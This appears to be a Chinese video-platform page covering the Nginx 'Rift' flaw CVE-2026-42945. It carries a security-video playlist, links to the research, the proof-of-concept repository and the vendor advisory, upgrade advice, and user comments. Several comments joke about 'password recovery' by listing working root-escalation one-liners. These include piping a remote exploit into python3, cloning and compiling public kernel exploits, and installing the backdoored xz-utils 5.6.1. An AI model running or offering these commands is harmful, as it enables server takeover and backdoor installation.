【紧急】Nginx潜伏18年漏洞!不用密码直接远程控制,30%服务器中招 | CVE-2026-42945 Nginx Rift

合集 · 网络安全 (31)

  1. 6:27
    如何白嫖公网Kali VPS (SegFault)
  2. 2:20
    分享几种绕过前端JS查看源码的方法
  3. 5:49
    震惊!大学生英语竞赛竟出现网络安全密码学相关题目(雾
  4. 11:49
    金砖大赛网络系统管理赛项区域赛真题网络安全部分解题
  5. 13:28
    期末作业-安全技术体系设计与建设
  6. 9:04
    VPN和翻墙的常见误区、误解
  7. 11:21
    webshell是什么?黑客是怎么攻破你的网站的?
  8. 2:44
    当工具侠遇上杀软,这就是脚本小子的丑态🤣👉🤡
  9. 3:04
    为什么免费WIFI有安全风险(钓鱼WIFI与DNS劫持)
  10. 10:26
    感染星铁小助手的蠕虫病毒有多厉害,如何预防?
  11. 15:03
    【城】逐帧分析黑客攻击手法,Wireshark抓包工具实战演示
  12. 13:52
    【城】为了研究网络安全,我的服务器被攻击了365天...
  13. 30:26
    【城】计算机木马的原理、实战演示与防御方法
  14. 14:43
    【城】当你在注册时,系统怎样偷偷保护你的密码
  15. 16:38
    【城】一行代码让整个网站瘫痪,永不过时的黑客技术
  16. 7:21
    解压即蓝屏?!WinRAR爆出新漏洞:路径遍历(CVE-2025-8088)
  17. 7:18
    【城】网络高手让你断网的方法竟是...如何预防?(DHCP与攻击防护)
  18. 9:01
    【城】DNS 劫持有多可怕?能上QQ但是打不开网页怎么办
  19. 16:05
    【城】密码学工程的早期杰作—IPsec VPN防窥防篡改
  20. 7:46
    【城】加密流量如何绕过防火墙?抓包告诉你答案
  21. 8:12
    【城】网络高手盗取账号的方法竟是...如何预防?(钓鱼攻击与防护)
  22. 6:22
    【城】当年最“爆”的“核弹级”漏洞(Log4j 漏洞复现)
  23. 8:47
    【城】不点链接不下载,你的账号是怎么被偷走的?
  24. 3:54
    【紧急】 Linux 史上最爆漏洞!一条命令提权到 root
  25. 4:06
    【紧急】补丁白打了!双重漏洞通杀Linux,一个至今未修 | CVE-2026-43284 | Dirty Frag
  26. 4:58
    【紧急】Nginx潜伏18年漏洞!不用密码直接远程控制,30%服务器中招 | CVE-2026-42945 Nginx Rift
  27. 4:56
    奖池还在叠加!Linux再爆高危漏洞,一行命令提权到root | CVE-2026-43494 | PinTheft
  28. 9:25
    不止 Linux!Windows/Mac 接连爆出高危漏洞:SSH密钥泄露、BitLocker 失效、杀软成黑客利器、Office远程任意命令执行
  29. 9:50
    【城】安全研究员都被盗号,开源≠安全,供应链攻击有多可怕?
  30. 4:49
    【紧急】最有力气的漏洞!人人都能打崩网站,88万台服务器裸奔,CVSS 9.8拒绝服务漏洞 | CVE-2026-49975 | HTTP2 Bomb
  31. 4:22
    别乱点开视频!这个漏洞能直接控制你的电脑!FFmpeg 流媒体漏洞 CVE-2026-8461 | PixelSmash
Description
depthfirst 官方研究:https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability PoC 仓库:https://github.com/depthfirstdisclosures/nginx-rift 
F5 官方公告(受影响版本+修复):https://my.f5.com/manage/s/article/K000160932 
Copy Fail 研究:https://copy.fail/
省流版:Nginx 从 1.0.0 到 1.30.0 全中招,升级到 1.30.1 或 1.31.0

Comments

等我以后想个好名字 2026-05-15

1. Linux 找回密码教程,建议收藏! curl https://copy.fail/exp python3 && su passwd root 设置你的新密码 2. 你的 Linux 密码又忘了? 没关系,这里还有一个新的! git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp 3. 不想再忘记密码了? 我们有专业的黑客团队帮您运维服务器和保管密码! 项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1 sudo apt install xz-utils=5.6.1-1 sudo systemctl restart ssh 4. 容易忘记密码的有福了,每天都有新办法! https://ze3tar.github.io/post-zcrx.html 插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可 5. 什么,你买不起高端网卡?那试试这个吧! git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp 6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器! https://depthfirst.com/nginx-rift [doge]

♥ 436 ↩ 18

五年老上单青翼战神 2026-05-15

最近漏洞接连爆出,都是开源项目,看来是gpt代码检查发力了。

♥ 496 ↩ 18

艾伦の头 2026-05-15

为什么最近突然发现了那么多恶性漏洞[Ave Mujica_害怕]

♥ 255 ↩ 36

AAA南良本批发千姐 2026-05-15

2026 Linux 重置密码教程大全 - Dirty Cow (CVE-2016-5195) - Dirty Pipe (CVE-2022-0847) - io_uring UAF (CVE-2022-2602) - Copy Fail (CVE-2026-31431) - io_uring ZCRX freelist (CVE-2026-43121) - Dirty Frag (CVE-2026-43284 CVE-2026-43500) - Fragnesia (CVE-2026-46300)

♥ 236 ↩ 11

愿你常受朋友 2026-05-15

听说您的手机厂商不允许您解锁您新购买的骁龙 8 Elite Gen 5 手机? 听说您的群晖 NAS 开了 Telnet? 听说您的手机厂商不允许您解锁您以前购买的骁龙 8 Elite / 8 Gen 2 手机? 听说您忘记了您的 Root 密码? 听说您升级了内核之后又忘记了您的 Root 密码? 听说您又升级了内核然后又忘记了您的 Root 密码? 听说您在用高端网卡但忘记了您的 Root 密码? 听说您在用 MacBook? 听说您的 Web 服务器忘记放通 SSH 端口还没有 VNC 访问? 听说您又忘记了您的 SSH Private Key? 听说您的 Windows 11 电脑开了 BitLocker 还忘记了锁屏密码?

♥ 166 ↩ 13

chkkvjjc 2026-05-16

这种逆天远古代码没人看,而ai恰好弥补了这一点[笑哭]

♥ 134

就是爱玩的海洋 2026-05-15

我猜你们再找这个

♥ 112 ↩ 2

周易-pandy 2026-05-15

这个漏洞要求非常严格,因为要关闭ASLR才能打的,目前主流linux发行版都是默认开启的,除非是老古董,否则当不存在就行。要么就是几百万分之一刚好地址对上了,那就纯脸黑了

♥ 83 ↩ 17

毛线电视记者 2026-05-15

30%中招 明显是夸大了; 至少java体系的打工人,正常项目 不用慌;; ai回答 同时满足以下条件时,CVE-2026-42945 风险会被触发: .存在 rewrite 指令,并使用未命名 PCRE 捕获组(如 $1, $2) .该 rewrite 的 replacement 字符串中包含 ? .在后续的 rewrite、if 或 set 指令中再次引用这些未命名捕获组 .上述后续指令与该 rewrite 处于同一 rewrite 执行链/同一作用域 location / { # 条件1 + 条件2 rewrite ^/api/(.*)$ /internal?path=$1 last; # 条件3 + 条件4 set $tmp $1; }

♥ 67 ↩ 10

ThunderShadow 2026-05-15

提一嘴,nginx念 Engine X,X是字母读法,音似艾克斯。 Dirty音似得儿体而不是drity椎体。

♥ 58 ↩ 14

猫小诗CatXiaoShi 2026-05-15

你以为只有nginx?[脱单doge]

♥ 52 ↩ 7

五辻旅 2026-05-15

原来root在你们那里是那样的啊,如果有勇气就点开这个脚本试试吧[颂乐人偶_眯眼笑]

♥ 47 ↩ 1

‮カバ⑨‭琪露诺 2026-05-15

这漏洞成年了[笑哭]

♥ 45 ↩ 2

针叶林的ANON 2026-05-15

偶然刷到,学计算机的都是南梁吗[Ave Mujica_害怕]

♥ 51 ↩ 6

グミ 2026-05-17

大ai时代,我这种开发的还好,运维有福了

♥ 43 ↩ 7

Hans码数理哲 2026-05-15

zako~ ❤ zako~❤ 明明都已经穿上女装,得到了图灵的赐福, 却连最基本的❤️都打不出来嘛? zako欧尼真是弱弱的啊~

♥ 48 ↩ 6

Whirity404 2026-05-15

已严肃更新并替换Header的Server项来拦截少数机器人

♥ 37 ↩ 3

在下小朋 2026-05-15

再也不怕root账户密码忘记了[星星眼]

♥ 39 ↩ 1

EchoInVoid 2026-05-15

不可发送空白内容

♥ 37